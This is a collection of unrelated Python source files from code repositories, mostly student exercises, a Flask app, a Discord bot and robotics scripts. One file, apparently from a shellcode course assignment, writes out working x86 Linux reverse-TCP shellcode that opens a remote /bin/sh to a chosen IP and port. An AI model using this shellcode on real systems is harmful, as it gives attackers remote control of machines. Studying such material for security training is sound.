f5fb5489eb2fb4e22cb21eaf7f1cf6fb94bbd911 | Python | Dhual-Yhn/setp02 | /cachipun.py | UTF-8 | 1,737 | 3.78125 | 4 | [] | no_license | # Set de problemas #2
# Problema 5.
# Lenguaje y Tecnicas de Programacion
# Profesor: Igor Caracci
# Profesor(Ayudante): Andres Caro
# Universidad de Santiago de Chile
# 07 de mayo del 2013
#
# Descripcion:
#
# Programa del juego clasico "cachipun"
def ganador_cachipun(lista):
# Verifico numero de jugadores
if ( len(lista) != 2 ):
raise Exception ("Numero incorrecto de jugadores")
# Verifico jugadas realizadas
if ( lista[0][1] != 'R' and lista[0][1] != 'P' and lista[0][1] != 'T' ):
raise Exception ("Jugada no valida")
# Veo los posibles resultados
if ( lista[0][1] == lista[1][1] ):
print( "Ganador : ",lista[0][0]," Jugada: ",lista[0][1] )
elif ( lista[0][1] == 'P' and lista[1][1] == 'R' ):
print( "Ganador : ",lista[0][0]," Jugada: ",lista[0][1] )
elif (lista[0][1] == 'P'):
print( "Ganador : ",lista[1][0]," Jugada: ",lista[1][1] )
elif ( lista[0][1] == 'R' and lista[1][1] == 'P' ):
print( "Ganador : ",lista[1][0]," Jugada: ",lista[1][1] )
elif (lista[0][1] == 'R'):
print( "Ganador : ",lista[0][0]," Jugada: ",lista[0][1] )
elif ( lista[0][1] == 'T' and lista[1][1] == 'P' ):
print( "Ganador : ",lista[0][0]," Jugada: ",lista[0][1] )
else:
print( "Ganador : ",lista[1][0]," Jugada: ",lista[1][1] )
return
lista = []
while True:
nombre = input('Ingrese nombre del jugador, 0 para terminar : ');
if ( nombre == '0' ):
break
jugada = input('Ingrese jugada (R/T/P) :').upper();
juego = []
juego.append (nombre)
juego.append (jugada)
lista.append (juego)
ganador_cachipun(lista)
| true |
456231f45a34ed8e3c4bd4cca08f87d173c7e6dd | Python | bagua0301/red_slg | /OriginalPlan/trunk/client/doc/DataConvert/toServer/data_skill_point.py | UTF-8 | 2,266 | 2.515625 | 3 | [] | no_license | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
'''
技能点购买配置
@author: ZhaoMing
@deprecated: 2014-07-08
'''
import os
# 导入要用到的函数
from libs.utils import load_excel, load_sheel, module_header, module_php_header, gen_erl, gen_xml, prev, get_value,gen_php
# 导入礼包数据配置.xlsx,文件统一放置在docs目录
work_book = load_excel(ur"skill")
# Erlang模块头说明,主要说明该文件作用,会自动添加-module(module_name).
# module_header函数隐藏了第三个参数,是指作者,因此也可以module_header(ur"礼包数据", module_name, "King")
# Erlang需要导出的函数接口, append与erlang的++也点类似,用于python的list操作
# Erlang函数一些注释,可以不写,但建议写出来
# 生成枚举的工具函数
def enum(module, str_enum):
str_enum = str_enum.replace(" ", "")
str_enum = str_enum.replace("\n", "")
idx = 0
for name in str_enum.split(","):
if '=' in name:
name,val = name.rsplit('=', 1)
if val.isalnum():
idx = eval(val)
setattr(module, name.strip(), idx)
idx += 1
## 必须和excel里面的列保持一致的顺序
BaseColumn = """
nth ,gold
"""
class FieldClassBase:
def __init__(self):
enum(FieldClassBase, BaseColumn)
# 生成域枚举
BaseField = FieldClassBase()
# 列表去重复
def unique_list(seq, excludes=[]):
seen = set(excludes) # seen是曾经出现的元素集合
return [x for x in seq if x not in seen and not seen.add(x)]
skill_erl = "data_skill_point"
data_skill = module_header(ur"技能点购买配置", skill_erl, "lhh", "skill.xlsx", "data_skill_point.py")
data_skill.append("""
-include("skill.hrl").
-export([get/1]).
""")
stone_dict = {}
skill_base = []
skill_base.append("%% @spec get(Times::int()) -> Cost::int().")
@load_sheel(work_book, ur"技能点购买")
def get_base_cost(content):
times = int(content[BaseField.nth])-1
cost = int(content[BaseField.gold])
skill_base.append("""get({0}) -> {1}; """.format(times, cost))
return []
get_base_cost()
skill_base.append("get(_) -> 500.")
data_skill.extend(skill_base)
gen_erl(skill_erl, data_skill) | true |
710b05121ea3ec9b5caa5493ab5a7005f9fb1f07 | Python | mridubhatnagar/Word-Notifier | /build_vocabulary.py | UTF-8 | 2,855 | 2.828125 | 3 | [] | no_license | import os
import requests
import json
import datetime
import smtplib
import logging
from email.mime.text import MIMEText
logging.basicConfig(level=logging.DEBUG)
def fetch_response(url=None):
"""
A GET request call is done on
wordOftheDay endpoint in
wordlink API
"""
response = requests.get(url)
byte_response = response.content
unicode_response = byte_response.decode("utf-8")
logging.info("JSON response is fetched")
parse_response(unicode_response)
def parse_response(response):
"""
Returned response is
parsed and word of the day.
origin, date, usage, meaning,
part of speech and source are
retrieved respectively.
"""
json_response = json.loads(response)
word_of_the_day = json_response["word"]
origin = json_response["note"]
date = json_response["publishDate"]
usage = json_response["examples"][0]["text"]
meaning = json_response["definitions"][0]["text"]
part_of_speech = json_response["definitions"][0]["partOfSpeech"]
source = json_response["definitions"][0]["source"]
logging.info("Parsed JSON response")
format_response(word_of_the_day, origin, date, usage, meaning, part_of_speech, source)
def format_response(word_of_the_day, origin, date, usage, meaning, part_of_speech, source):
"""
Selective key values pairs
which are retrieved are put
in an empty dictionary and
output is shown.
"""
Dict={}
Dict["wordOfTheDay"] = word_of_the_day
Dict["origin"] = origin
Dict["date"] = date
Dict["usage"] = usage
Dict["meaning"] = meaning
Dict["part_of_speech"] = part_of_speech
Dict["source"] = source
email_notification(Dict)
def email_notification(message):
"""
Instead of seeing every
new word on the terminal,
daily the end user gets a
email notification regarding
word of the day.
"""
smtp_server = smtplib.SMTP('smtp.gmail.com', 587)
smtp_account = os.environ.get('MAIL_ACCOUNT')
smtp_password = os.environ.get('MAIL_PASSWORD')
mailto = os.environ.get('MAILTO')
msg = json.dumps(message, indent=4)
smtp_server.ehlo()
smtp_server.starttls()
try:
smtp_server.login(smtp_account, smtp_password)
except smtplib.SMTPAuthenticationError:
logging.error('Could not login to the smtp server please check your username and password')
sys.exit(1)
msg = MIMEText(msg)
msg['Subject'] = 'Word Of The Day!'
msg['From'] = smtp_account
msg['To'] = mailto
smtp_server.send_message(msg)
logging.info("Email notification sent!")
smtp_server.quit()
api_key = os.environ.get('API_KEY')
date = datetime.datetime.today().strftime('%Y-%m-%d')
url = 'http://api.wordnik.com:80/v4/words.json/wordOfTheDay?'+ 'date='+date+'&'+'api_key='+api_key
fetch_response(url)
| true |
8b69df9a732b92ac447a20b361123acb83ce0e43 | Python | Tekken-New-Blood/cleanup_set_your_roles | /cleanup_roles.py | UTF-8 | 1,572 | 2.578125 | 3 | [] | no_license | import discord
client = discord.Client()
yyaen_id = 95485950833983488
shreeder_id = 161215065926795265
set_your_roles_channel_id = 492305188829265941
wrong_channel_msg = "This isn't #set_your_roles"
@client.event
async def on_ready():
print('We have logged in as {0.user}'.format(client))
@client.event
async def on_message(message):
if message.author == client.user:
return
if message.author.id == shreeder_id:
# Night Shreeder
if "night" in message.content.lower():
await message.channel.send("gn Shreeder")
if message.content.startswith('$testcleanup'):
print("Test command called")
print(message.channel.id)
await _cleanup_channel(message.channel, True)
if message.content.startswith('$cleanup'):
print(message.channel.id)
if message.channel.id == set_your_roles_channel_id:
await _cleanup_channel(message.channel, False)
else:
await message.channel.send(wrong_channel_msg)
print(wrong_channel_msg)
async def _cleanup_channel(channel, dryrun):
async for elem in channel.history():
if elem.author.id != yyaen_id:
try:
if dryrun:
print("{} :: {}".format(elem.author, elem.content))
else:
await elem.delete()
except Exception as e:
print("Failed to delete msg :: {}".format(e))
def get_credentials():
with open("config.txt") as f:
return f.readline()
client.run(get_credentials()) | true |
b7619583381bdf79ad56de57e3c5f0c353c88c44 | Python | Indhuu/git-github | /python/10pwdfor.py | UTF-8 | 330 | 3.296875 | 3 | [] | no_license | # 10 attempt password for loop
Attempt = 1
N = 0
for N in range(5):
password = input('Enter the password : ')
if password == 'charu' and Attempt == 1:
print ('correct password')
break
else:
N += 1
break
print ('5 attemps over. 5 more left')
| true |
197adf7f6577499c43d119f127ada8613ef050ba | Python | prachi464/Python-assignment | /PYTHONTRAINNING/module5/indian_batsman.py | UTF-8 | 1,698 | 2.90625 | 3 | [] | no_license | Info={1:{'player_type':'Batsman','player_name':'virat_kohli','matches':'200','runs':'15000','average':'12','Highest_score':'200'}
,2:{'player_type':'Batsman','player_name':'Rohit_Sharma','matches':'250','runs':'20000','average':'20','Highest_score':'250'}
,3:{'player_type':'Bowler','player_name':'Jasmeet_bumrah','matches':'100','runs':'200','average':'10','Highest_score':'80'}
,4:{'player_type':'Allrounder','player_name':'ravindra_jadeja','matches':'100','runs':'1500','average':'8','Highest_score':'100'}
,5:{'player_type':'Bowler','player_name':'Mohammad_shami','matches':'300','runs':'500','average':'15','Highest_score':'70'}}
print(Info)
print("\n")
for p_id,p_info in Info.items():
print("\n player",p_id)
for key in p_info:
if key==['Highest_score']:
print(key)
print(key+':',p_info[key])
Info={'Batsman':{'virat_kohli':{'matches':'200','runs':'15000','average':'12','Highest_score':'200'},
'Rohit_Sharma':{'matches':'250','runs':'20000','average':'20','Highest_score':'250'}},
'Bowler':{'Jasmeet_bumrah':{'matches':'100','runs':'200','average':'10','Highest_score':'80'}},
'Allrounder':{'ravindra_jadeja':{'matches':'100','runs':'1500','average':'8','Highest_score':'100'}}}
for p_id,p_info in Info.items():
print("\n player",p_id)
for key,p_id in p_info.items():
print(key,p_id)
for k in p_id.items():
print(k)
print(Info['Batsman']['virat_kohli']['runs'])
c=[]
for p_id in Info.keys():
for key in Info[p_id].keys():
c.append(Info[p_id][key]['Highest_score'])
print("Highest score",max(c))
| true |
3c9c923f21e202ea5f9180b46361f70932f9e817 | Python | fairbank-lab-ba-tagging/cold-probe | /Arduino/arduino_gui_2.0/scripts/runExperiment_noAblation.py | UTF-8 | 1,926 | 3.203125 | 3 | [] | no_license | from pyfirmata import INPUT, OUTPUT
from time import sleep, time
def run(board):
analog_pins = board.analog_pins # Pins 0-5
digital_pins = board.digital_pins # Pins 2-13
# Stepper pins
in_1 = digital_pins[2]
in_2 = digital_pins[3]
stepper_out = digital_pins[4]
in_1.mode = OUTPUT
in_2.mode = OUTPUT
stepper_out.mode = INPUT
# Laser pin
laser_trigger = digital_pins[5]
laser_trigger.mode = OUTPUT
# Camera pin
camera_trigger = digital_pins[6]
camera_trigger.mode = OUTPUT
# Prepare pins
in_1.write(0)
in_2.write(0)
laser_trigger.write(0)
camera_trigger.write(0)
print('Start')
duh = input('Send Down? [Enter]')
send_down(in_1, in_2, stepper_out)
duh = input('Send Up? [Enter]')
send_up(in_1, in_2, stepper_out)
# duh = input('Trigger Camera? [Enter]')
ttl(camera_trigger)
print('Picture Taken!')
# Defining functions to be used!!!
def ttl(pin, duration=0.01):
pin.write(1)
sleep(duration)
pin.write(0)
def fire_laser(pin, pulses, frequency):
period = 1 / frequency
last_pulse = 0
i = 0
while i < pulses:
now = time()
if now - last_pulse > period:
ttl(pin, duration=0.01)
last_pulse = now
i += 1
def trigger(trigger):
while not trigger.read():
sleep(0.001)
def send_up(start_pin, direction_pin, stop_trigger):
print('Moving up...')
start_time = time()
direction_pin.write(1)
ttl(start_pin)
trigger(stop_trigger)
stop_time = time()
print('Move up complete! {:.4}s'.format(stop_time - start_time))
def send_down(start_pin, direction_pin, stop_trigger):
print('Moving down...')
start_time = time()
direction_pin.write(0)
ttl(start_pin)
trigger(stop_trigger)
stop_time = time()
print('Move down complete! {:.4}s'.format(stop_time - start_time))
| true |
8bef1d4899d6b4485ed8f2f1888056e64475b07e | Python | lrothschildshea/RL-Clue-AI | /game.py | UTF-8 | 6,172 | 2.953125 | 3 | [] | no_license | from cards import Cards
from qLearnPlayer import Player as QPlayer
from deepQPlayer import Player as DeepQPlayer
from player import Player
import random, sys
class Game:
currentPlayer = 0
solution_guessed = False
turn = 0
rooms = ["Ballroom", "Billiard Room", "Conservatory", "Dining Room", "Hall", "Kitchen", "Library", "Lounge", "Study"]
weapons = ["Candlestick", "Knife", "Lead Pipe", "Revolver", "Rope", "Wrench"]
characters = ["Mr. Green", "Colonel Mustard", "Mrs. Peacock", "Professor Plum", "Ms. Scarlet", "Mrs. White"]
def __init__(self, numberOfPlayers, deepQActionSet, qNetworks, qtbl={}, numQlearn=0, numDeepQ=0):
if numberOfPlayers > 1 and numberOfPlayers < 7:
self.numPlayers = numberOfPlayers
self.board = self.init_board()
#door = (hall_loc, room_num, room_loc)
self.doors = [((4, 6), 1, (3, 6)), ((4, 8), 2, (4, 9)), ((7, 11), 2, (6, 11)), ((7, 12), 2, (6, 12)), ((6, 17), 3, (5, 17)), ((8, 7), 4, (8, 6)), ((11, 3), 4, (10, 3)), ((8, 17), 5, (9, 17)), ((12, 15), 5, (12, 16)), ((11, 1), 6, (12, 1)), ((15, 6), 6, (15, 5)), ((19, 5), 7, (19, 4)), ((19, 7), 8, (19, 8)), ((16, 9), 8, (17, 9)), ((16, 14), 8, (17, 14)), ((19, 16), 8, (19, 15)), ((17, 19), 9, (18, 19))]
self.cards, self.solution = Cards(self.numPlayers).deal_cards()
self.players = []
for i in range(numQlearn):
self.players.append(QPlayer(self.characters[i], self.cards[i], qtbl))
for i in range(numDeepQ):
self.players.append(DeepQPlayer(self.characters[numQlearn+i], self.cards[numQlearn+i], self.board, deepQActionSet, qNetworks))
for i in range(self.numPlayers - numQlearn - numDeepQ):
self.players.append(Player(self.characters[numQlearn + numDeepQ + i], self.cards[numQlearn + numDeepQ + i]))
def run_game(self):
#while game not over
while not self.solution_guessed:
self.turn += 1
if(self.turn > 5000):
#assume random players not making progress so end game by removing all but 1 players
self.players = [self.players[0]]
self.currentPlayer = 0
if (self.turn % 10) == 0:
print("Turn:", self.turn)
if len(self.players) == 1:
print("Only one player left. Game Over!")
print("Player ", self.players[self.currentPlayer].character, "has won!")
print("Solution:", self.solution)
self.solution_guessed = True
return (len(self.players), self.players[self.currentPlayer].character, self.turn)
# this is needed in stead of removing current from a copy of players because it maintains the correct order
other_players = []
for i in range(self.currentPlayer + 1, self.currentPlayer + self.numPlayers):
i = i % self.numPlayers
other_players.append(self.players[i])
#make move
move = self.players[self.currentPlayer].make_move(self.board, self.doors, self.roll_dice(), self.players[self.currentPlayer].location, other_players, self.solution)
#if move was to guess solution then handle guess
if move != None:
if move == self.solution:
self.solution_guessed = True
print("Player ", self.players[self.currentPlayer].character, "has won!")
print("Solution:", move)
return (len(self.players), self.players[self.currentPlayer].character, self.turn)
else:
print("Player ", self.players[self.currentPlayer].character, "has lost! (Player Type:" + self.players[self.currentPlayer].type + ")")
for i in other_players:
i.record_cards(self.players[self.currentPlayer].cards)
self.players.remove(self.players[self.currentPlayer])
self.currentPlayer -= 1
self.numPlayers -= 1
self.currentPlayer = (self.currentPlayer + 1) % self.numPlayers
def roll_dice(self):
return random.randint(1, 6)
def init_board(self):
#-1 = no space 0 = hallway num=room
board = [None]*25
board[0] = [1,1,1,1,1,1,-1,0,-1,-1,-1,-1,-1,-1,-1,-1,0,-1,3,3,3,3,3,3]
board[1] = [1,1,1,1,1,1,1,0,0,2,2,2,2,2,2,0,0,3,3,3,3,3,3,3]
board[2] = [1,1,1,1,1,1,1,0,0,2,2,2,2,2,2,0,0,3,3,3,3,3,3,3]
board[3] = [1,1,1,1,1,1,1,0,0,2,2,2,2,2,2,0,0,3,3,3,3,3,3,3]
board[4] = [-1,0,0,0,0,0,0,0,0,2,2,2,2,2,2,0,0,3,3,3,3,3,3,3]
board[5] = [0,0,0,0,0,0,0,0,0,2,2,2,2,2,2,0,0,3,3,3,3,3,3,3]
board[6] = [-1,4,4,4,4,4,0,0,0,2,2,2,2,2,2,0,0,0,0,0,0,0,0,-1]
board[7] = [4,4,4,4,4,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
board[8] = [4,4,4,4,4,4,4,0,0,-1,-1,-1,-1,-1,0,0,0,0,0,0,0,0,0,-1]
board[9] = [4,4,4,4,4,4,4,0,0,-1,-1,-1,-1,-1,0,0,5,5,5,5,5,5,5,5]
board[10] = [-1,4,4,4,4,4,0,0,0,-1,-1,-1,-1,-1,0,0,5,5,5,5,5,5,5,5]
board[11] = [-1,0,0,0,0,0,0,0,0,-1,-1,-1,-1,-1,0,0,5,5,5,5,5,5,5,5]
board[12] = [6,6,6,6,6,6,0,0,0,-1,-1,-1,-1,-1,0,0,5,5,5,5,5,5,5,5]
board[13] = [6,6,6,6,6,6,0,0,0,-1,-1,-1,-1,-1,0,0,5,5,5,5,5,5,5,5]
board[14] = [6,6,6,6,6,6,0,0,0,-1,-1,-1,-1,-1,0,0,5,5,5,5,5,5,5,5]
board[15] = [6,6,6,6,6,6,0,0,0,0,0,0,0,0,0,0,0,0,0,5,5,5,5,5]
board[16] = [6,6,6,6,6,6,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,-1]
board[17] = [-1,0,0,0,0,0,0,0,8,8,8,8,8,8,8,8,0,0,0,0,0,0,0,0]
board[18] = [0,0,0,0,0,0,0,0,8,8,8,8,8,8,8,8,0,0,9,9,9,9,9,-1]
board[19] = [-1,7,7,7,7,0,0,0,8,8,8,8,8,8,8,8,0,0,9,9,9,9,9,9]
board[20] = [7,7,7,7,7,7,0,0,8,8,8,8,8,8,8,8,0,0,9,9,9,9,9,9]
board[21] = [7,7,7,7,7,7,0,0,8,8,8,8,8,8,8,8,0,0,9,9,9,9,9,9]
board[22] = [7,7,7,7,7,7,0,0,8,8,8,8,8,8,8,8,0,0,9,9,9,9,9,9]
board[23] = [7,7,7,7,7,7,-1,0,0,0,8,8,8,8,0,0,0,-1,9,9,9,9,9,9]
board[24] = [-1,-1,-1,-1,-1,-1,-1,-1,-1,0,-1,-1,-1,-1,0,-1,-1,-1,-1,-1,-1,-1,-1,-1]
return board
| true |
90e27cf3514a0ac329f60d161e1aed9cb2336868 | Python | Hidenaka82/Shopping-fruits | /test.py | UTF-8 | 1,189 | 4.15625 | 4 | [] | no_license |
items = {'apple': 1, 'banana': 2, 'orange': 4}
while True:
money = int(input('Please enter your budgeds to purchase fruits: $'))
for item_name in items:
#print('--------------------------------------------------')
print('You have $' + str(money) + ' to purchase products')
print(item_name + ' costs $' + str(items[item_name]) )
input_count = input('Please enter how many ' + item_name + ' you would like to purchase:')
print('You will purchase' + input_count + "of" + item_name)
count = int(input_count)
total_price = items[item_name] * count
print('Total will be $' + str(total_price) )
if money >= total_price:
print("you purchased "+ input_count + "of " + item_name)
money -= total_price
if money == 0:
print("It's out of budges!")
else:
print('There is no enough money to purchase products')
print("I'm sorry, you could not buy "+ item_name)
print('You have $' + str(money) + ' Left')
play_again = money("If you'd like to purchase again, plese type 'yes' ")
if play_again == 'yes':
continue
else:
break | true |
3c949cc737e3b04c28c04d243823591c8d302832 | Python | LYSuperCarrot/tracking-robot | /my_yolo_track/scripts/start_tracking.py | UTF-8 | 4,173 | 2.53125 | 3 | [] | no_license | #!/usr/bin/env python
import rospy
from std_msgs.msg import String
from mdl_people_tracker.msg import TrackedPersons2d
from geometry_msgs.msg import PoseArray
from geometry_msgs.msg import Twist
speed = 0.0 # global speed of turtlebot
turn = 0.0 # turning rate
name = ""
distance = -1
track_index = 0
saved_depth = 0.0 # if the people dismiss due to the obstcale from camera, save the lasted distance between camera and object, then move robot to the dismissing position
data_boxes = []
def get_time(depth):
robot_speed = 0.1
time = depth/robot_speed
return time
def callback(data):
#print data.boxes
global speed
global turn
global name
global distance
global track_index
global data_boxes
data_length = len(data.boxes)
data_boxes = data.boxes
if(data_length): # there is boxes transmitted here
if(name == "" and distance == -1):
id_flag = False # id flag
while(not id_flag):
i = 0 # index
name = input("Please input a people id as the tracking target>>")
distance = input("Please input the distance between people and turtlebot>>")
for obj in data.boxes:
if(data.boxes[i].track_id == name):
print("track_id is found, target selected...")
id_flag = True
track_index = i
else:
print("target searching...")
i+=1
else:
bbox_center = data.boxes[track_index].x + data.boxes[track_index].w/2
if(data.boxes[track_index].depth > distance):
speed = 0.1
print("forward")
if(data.boxes[track_index].depth < distance):
speed = -0.1
print("drawback")
if(data.boxes[track_index].depth == distance):
speed = 0.0
print("stop")
if(bbox_center > 320):
print("TURN RIGHT")
turn = -0.1
if (bbox_center < 280):
print("TURN LEFT")
turn = 0.1
if (bbox_center >=280 and bbox_center <= 320):
print("CENTERED")
turn = 0.0
else:
speed = 0.0
turn = 0.0
print("No data received...")
def listener():
# In ROS, nodes are uniquely named. If two nodes with the same
# name are launched, the previous one is kicked off. The
# anonymous=True flag means that rospy will choose a unique
# name for our 'listener' node so that multiple listeners can
# run simultaneously.
rospy.init_node('start_tracking_node', anonymous=True)
global speed
global turn
global name
global distance
name = input("Please input a people id as the tracking target>>")
distance = input("Please input the distance between people and turtlebot>>")
twist = Twist()
pub = rospy.Publisher('~cmd_vel', Twist, queue_size=1)
#rospy.Subscriber('/mdl_people_tracker/tracked_persons_2d ', TrackedPersons2d, callback)
rospy.Subscriber("/mdl_people_tracker/tracked_persons_2d", TrackedPersons2d, callback)
while not rospy.is_shutdown():
# turn if we hit the line
if ( turn != 0.0 or speed != 0.0):
print("speed is %s" %speed)
print("turn is %s" %turn)
twist.linear.x = speed; twist.linear.y = 0; twist.linear.z = 0
twist.angular.x = 0; twist.angular.y = 0; twist.angular.z = turn
turn = 0.0
# straight otherwise
else:
print("stop %s" %speed)
twist.linear.x = 0.0; twist.linear.y = 0; twist.linear.z = 0
twist.angular.x = 0; twist.angular.y = 0; twist.angular.z = 0
# send the message and delay
pub.publish(twist)
rospy.sleep(0.1)
# spin() simply keeps python from exiting until this node is stopped
rospy.spin()
if __name__ == '__main__':
listener() | true |
2b03c7b2aa5eb25b203b5f71a3d5640ac6e6853c | Python | kamchung322/headfirstpython | /webapp/vsearch4web.py | UTF-8 | 2,712 | 2.609375 | 3 | [] | no_license | from flask import Flask, render_template, request, redirect, escape, copy_current_request_context
from vsearch import search4letters
from DBcm import UseDatabase
from threading import Thread
import time
app = Flask(__name__)
app.config['dbconfig'] = {'host': '127.0.0.1',
'user': 'vsearch',
'password': 'vsearchpasswd',
'database': 'vsearchlogDB'}
# No need to use redirect, it costs 2 request
# Flask can associate more than one URL to given function.
# @app.route('/')
# def hello() -> '302':
# return redirect('/entry')
@app.route('/search4', methods=['Post'])
def do_search() -> 'html':
# use @copy_current_request_context to preserve the data in request
@copy_current_request_context
def log_request(req: 'flask_request', res: str) -> None:
""" log information to vsearch.log """
time.sleep(10)
with UseDatabase(app.config['dbconfig']) as cursor:
_SQL = """insert into log
(phrase, letters, ip, browser_string, results )
values
(%s, %s, %s, %s, %s)"""
cursor.execute(_SQL, (req.form['phrase'],
req.form['letters'],
req.remote_addr,
req.user_agent.browser,
res))
phrase = request.form['phrase']
letters = request.form['letters']
results = str(search4letters(phrase, letters))
try:
t = Thread(target=log_request, args=(request, results))
t.start()
# log_request(request, results)
except Exception as err:
print("Some error in log_request :", err)
return render_template('result.html', the_title='Here are your result',
the_phrase=phrase, the_letters=letters, the_results=results,)
@app.route('/')
@app.route('/entry')
def entry_page() -> 'html':
return render_template('entry.html', the_title='Welcome to search4letters on the web!')
@app.route('/viewlog')
def view_the_log() -> 'html':
contents = []
with UseDatabase(app.config['dbconfig']) as cursor:
_SQL = """SELECT phrase, letters, ip, browser_string, results
from log"""
print("SQL : ", _SQL)
cursor.execute(_SQL)
contents = cursor.fetchall()
titles = ('Phrase', 'Letters', 'Remote_addr', 'User_agent', 'Results')
return render_template('viewlog.html',
the_title='View log',
the_row_titles = titles,
the_data = contents)
if __name__ == '__main__':
app.run(debug=True) | true |
bccc3c5db05f7d4fa4b69988fd086173dea27234 | Python | jamesl33/210CT-Course-Work | /task6/main.py | UTF-8 | 1,031 | 3.375 | 3 | [] | no_license | #!/usr/bin/python3
import datetime
from database import Database
from student import Student
from address import Address
def main():
student1 = Student(1, "Ryan", datetime.date(1978, 1, 12), Address(104, 'Main Street'), datetime.date(2017, 2, 9), '220CT', True)
student2 = Student(2, "Devin", datetime.date(2000, 1, 12), Address(10, 'Station Road'), datetime.date(2013, 3, 9), '210CT', False)
student3 = Student(3, "Rob", datetime.date(2002, 4, 2), Address(1, 'Lunch Lane'), datetime.date(2017, 3, 4), '210CT', True)
student4 = Student(4, "Ellen", datetime.date(1997, 1, 12), Address(1, 'Lunch Lane'), datetime.date(2017, 3, 9), '290COM', False)
student5 = Student(5, "Taylor", datetime.date(1995, 5, 9), Address(3, 'Judas Lane'), datetime.date(2017, 4, 9), '220CT', True)
students = [student5, student4, student3, student2, student1]
db = Database(students)
# Found student by id in this case it will be a list containing the reference to 'student3'
print(db.find(3, 'unique_id'))
main()
| true |
0c8b514dfdea1128a738e86fcf0cc23fa1664e57 | Python | sarkeur/terrarium | /database/rotate_delete_db.py | UTF-8 | 745 | 2.75 | 3 | [] | no_license | ## remove old values in database IMPORT ##
import MySQLdb
import time
from time import sleep
## FUNCTIONS ##
def clean_db():
db = MySQLdb.connect(host="localhost",user="root",passwd="nairolfuaebel", db="terrarium")
cursor = db.cursor()
try:
cursor.execute("""DELETE FROM temperature
WHERE date_mesure < DATE_SUB(NOW(), INTERVAL 1 MONTH)""")
db.commit()
except:
db.rollback()
db.close()
#### MAIN ####
print ("\n=========================================================================\n")
print (" Start script \"rotate_delete_db.py\"")
print ("\n=========================================================================\n")
sleep(60)
while(1):
clean_db()
sleep(3600)
| true |
57f2ce8da6834596e1f27b838eb5c723da25c2e9 | Python | leh08/web-template | /server/resources/file.py | UTF-8 | 931 | 2.6875 | 3 | [] | no_license | from flask_restful import Resource
from flask_uploads import UploadNotAllowed
from flask import request
from services import uploads
from services.locales import gettext
from schemas.file import FileSchema
file_schema = FileSchema()
class Upload(Resource):
@classmethod
def post(cls, flow_name: str):
"""
Used to upload a file
If there is a filename conflict, it appends a number at the end.
"""
data = file_schema.load(request.files) # {"file": FileStorage}
try:
file_path = uploads.save_file(data["file"], folder=flow_name)
basename = uploads.get_basename(file_path)
return {"message": gettext("file_uploaded").format(basename)}, 200
except UploadNotAllowed:
extension = uploads.get_extension(data["file"])
return {"message": gettext("file_illegal_extension").format(extension)}, 400
| true |
19eb03edcca390433487b21ad4e0c4a43ee44d64 | Python | Slumber-HK/SLAEx86 | /Assignment 2 - Reverse TCP/linux_x86_reverse_tcp.py | UTF-8 | 1,498 | 2.9375 | 3 | [] | no_license | import sys;
import re;
def main():
if len(sys.argv) != 3:
print "Usage: python {0} <IP> <PORT>".format(sys.argv[0])
exit()
ip = sys.argv[1]
is_valid = re.match("^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$", ip)
if not is_valid:
print "Do you know what IP is?"
exit()
ipNum = ip.split(".")
try:
port = int(sys.argv[2])
except:
print "Do you know what port is?"
exit()
if port < 1 or port > 65535:
print "Go Learn Network Basics!!"
exit()
if port < 1024:
print "Are you root to listen on {0}?".format(sys.argv[2])
hexPort = "{0:#0{1}x}".format(port,6)
shellcode = ("\\x31\\xc0\\x31\\xdb\\x99\\x52\\x42\\x52\\x42\\x52\\xb0\\x66\\x43\\x89\\xe1\\xcd\\x80\\x68" +
"\\x" + "{0:#0{1}x}".format(int(ipNum[0]),4)[-2:] +
"\\x" + "{0:#0{1}x}".format(int(ipNum[1]),4)[-2:] +
"\\x" + "{0:#0{1}x}".format(int(ipNum[2]),4)[-2:] +
"\\x" + "{0:#0{1}x}".format(int(ipNum[3]),4)[-2:] +
"\\x66\\x68" +
"\\x" + hexPort[-4:-2] + "\\x" + hexPort[-2:] +
"\\x66\\x52\\x89\\xe1\\x6a\\x10\\x51\\x92\\x52\\xb0\\x66\\xb3\\x03\\x89\\xe1\\xcd\\x80\\x6a\\x02\\x59\\x87\\xda\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\x41\\x51\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\xb0\\x0b\\x89\\xe3\\x99\\xcd\\x80")
print "Here is your TCP Reverse Shell shellcode\n"
print shellcode
if __name__ == "__main__":
main()
| true |
9b2fd294be850c941d4e4647fdb474c68cef7afd | Python | ymli1997/deeplearning-notes | /numerical/symbol-compute/04-expressions.py | UTF-8 | 2,423 | 3.796875 | 4 | [
"Apache-2.0"
] | permissive | #coding:utf-8
'''
表达式
'''
import sympy
sympy.init_printing()
from sympy import I, pi, oo
# 创建表达式
x = sympy.Symbol("x")
y = sympy.Symbol("y")
expr = 1 + 2 * x**2 + 3 * x**3
print(expr)
print(expr.args)
# 表达式简化
expr = 2 * (x**2 - x) - x * (x + 1)
print(expr)
print('simplify:',sympy.simplify(expr))
print('simplify:',expr.simplify())
expr = 2 * sympy.cos(x) * sympy.sin(x)
print(sympy.simplify(expr))
expr = sympy.exp(x) * sympy.exp(y)
print(expr.simplify())
'''
表达式简化,还可以通过调用sympy.trigsimp,sympy.powsimp,sympy.compsimp和sympy.ratsimp来简化
'''
# 表达式展开
expr = (x + 1) * (x + 2)
print('expand:',sympy.expand(expr))
# 三角函数展开
expr = sympy.sin(x + y)
print('expand:',sympy.expand(expr,trig=True))
print('expand:',expr.expand(trig=True))
expr = x*sympy.sin(x) + sympy.sin(x + y) + y
print('expand:',expr.expand(trig=True))
# 对数函数展开
a, b = sympy.symbols("a, b", positive=True)
print('expand:',sympy.log(a * b).expand(log=True))
# 复函数数展开
expr = sympy.exp(I*a + b)
print('expand:',expr.expand(complex=True))
# 幂函数展开
print('expand:',sympy.expand((a * b)**x, power_base=True))
print('expand:',sympy.exp((a-b)*x).expand(power_exp=True))
# 因式分解、合并同类项,
expr = sympy.factor(x**2 - 1)
print('factor:',expr)
# 三角函数因式分解
z = sympy.Symbol('z')
expr = sympy.factor(x * sympy.cos(y) + sympy.sin(z) * x)
print('factor:',expr)
# 对数函数合并
a = sympy.Symbol('a')
b = sympy.Symbol('b')
